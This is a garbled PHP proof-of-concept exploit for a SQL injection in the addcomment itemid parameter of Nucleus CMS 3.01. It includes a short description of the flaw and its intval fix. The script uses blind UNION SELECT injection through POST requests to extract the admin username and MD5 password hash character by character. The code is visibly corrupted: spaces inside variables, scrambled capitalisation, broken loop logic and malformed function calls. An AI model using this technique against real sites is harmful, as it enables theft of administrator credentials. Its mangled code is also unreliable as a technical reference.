Latest SQL overflow source code (conceptual version)
#! / usr / bin / php
// Nucleus CMS V3.01 Addcoment / ItemID SQL INJECTION Proof of Concept // By Acidbits Acidbits@hotmail.com 24-July-2004 //// Nucleus CMS (http://nucleuscms.org) IS A Weblog PHP MySQL application.//// This Proof of Concept dumps the username and MD5 (password) of the adminuser placed at first position // of members table. First of all checks if we can use "union select" or itisn't patched and then IF first // member is admin./// usage (in my debian box): // php4 -q nuc_addc_poc.php url
// Vulnerability description // // In action.php, function addcoment, there's no user input sanization forparameter itemid In line 65:. // $ blogid = getBlogIDFromItemID ($ post [ 'itemid']); // This allows to inject SQL TO GET DATA FORM The DATABASE./// Solution //// MODIFY LINE 65 with: // $ blogid = getBlogidFromitemid (INTVAL ($ pos ");
Echo " ----------------------------------------------- -------------------- / N | Nucleus CMS v3.01 addcoment / itemid SQL Injection Proof of concext | / n | ByacidBits Acidbits@hotmail.com 24-july -2004 | / N --------------------------------------------- -------------------- / n / n ";
IF ($ Argc <2) Die ("Usage:". $ argv [0]. "URL / N / N"); $ Host = $ Argv [1]; IF (Substr ($ Host, Strlen ($ HOST) -1, 1)! = '/') $ Host. = '/';
Echo "Checking if Vulnerable and /" Union Select / "Works ..."; if (Test_Cond ("1") &&! test_cond ("0")) ECHO "OK! / N"; Else Die ("IT DOESN ' T: - (/ N / N ");
Echo "Checking if First Member of Table Is Admin ..."; IF (Test_Cond ("1")) Echo "OK! / N"; Else Die ("IT's Not: - (/ N / N"); ECHO " / ngetting username: "; get_field (" mname "); echo" / ngetting MD5 (Password): "; get_field (" mpassword ");
DIE ("/ n / ndone! / n / n");
function get_field ($ field) {$ unval = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; $ idx = 1; $ min = 0; $ max = strlen ($ unval); while (! $ min = $ max) {$ mid = $ min (( $ MAX- $ min) / 2); if (Test_cond ("Substring ($ Field, $ IDX, 1)) =". ORD (Substr ($ UNVAL, $ MID, 1))))) {$ IDX ; Echo Substr ($ UNVAL, $ MID, 1); $ min = 0; $ max = Strlen ($ unval); if (! test_cond (")") ") Return; Else {IF (Substring ($ Field, $ IDX, 1)) <") <") <"))) $ MAX = $ min = $ min = $ MID;}} DIE ("/ n / nunexpected error! / n / n");
function test_cond ($ cond) {$ res = send_post ( "action = addcomment & url = index.php% 3Fitemid% 3D1 & itemid = 1 and 0 union select 1 from nucleus_member where madmin and mnumber = 1 And ". Urlencode ($ cond)." & body = a & user = a & userid = "); if (EREGI (" Nucleus_Ban ", $ RES) RETURN 0; Else Return 1;}
Function Send_Post ($ DATA) {Global $ Host; $ ch = curl_init (); curl_setopt ($ Ch, curlopt_url, $ host. "action.php"); curl_setopt ($ ch, curlopt_header, 0); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ Ch, curlopt_post, 1); curl_setopt ($ CH, CURLOPT_POSTFIELDS, $ DATA); $ DATA = CURL_EXEC ($ CURL_CLOSE ($ CH);
Return $ data;}
?>
